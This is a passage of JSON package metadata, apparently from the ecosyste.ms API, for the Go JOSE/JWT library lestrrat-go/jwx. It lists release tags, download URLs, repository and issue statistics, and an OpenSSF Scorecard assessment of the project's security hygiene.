rat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:57.911Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":1.0929961382075044,"forks_count":1.4345083313038627,"average":4.718126183312252},"purl":"pkg:golang/github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk%2Finternal%2Fcmd%2Fgenheader/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk%2Finternal%2Fcmd%2Fgenheader/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk%2Finternal%2Fcmd%2Fgenheader/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk%2Finternal%2Fcmd%2Fgenheader/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk%2Finternal%2Fcmd%2Fgenheader/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk%2Finternal%2Fcmd%2Fgenheader/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":10973094,"name":"github.com/Lestrrat-go/jwx","ecosystem":"go","description":"Package jwx contains tools that deal with the various JWx (JOSE)\ntechnologies such as JWT, JWS, JWE, etc in Go.\n\nThe primary focus of this library tool set is to implement the extremely\nflexible OAuth2 / OpenID Connect protocols. There are many other libraries\nout there that deal with all or parts of these JWx technologies:\n\nThis library exists because there was a need for a toolset that encompasses\nthe whole set of JWx technologies in a highly customizable manner, in one package.\n\nYou can find more high level documentation at Github (https://github.com/lestrrat-go/jwx)","homepage":"https://github.com/Lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/Lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/Lestrrat-go","versions_count":55,"first_release_published_at":"2019-05-20T02:55:45.000Z","latest_release_published_at":"2025-04-09T10:38:17.000Z","latest_release_number":"v1.2.31","last_synced_at":"2026-06-10T14:02:20.714Z","created_at":"2024-10-16T04:57:40.851Z","updated_at":"2026-06-10T14:02:20.715Z","registry_url":"https://pkg.go.dev/github.com/Lestrrat-go/jwx","install_command":"go get github.com/Lestrrat-go/jwx","documentation_url":"https://pkg.go.dev/github.com/Lestrrat-go/jwx#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30931130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-25T07:55:14.202Z","status":"ssl_error","status_checked_at":"2026-03-25T07:55:10.924Z","response_time":80,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api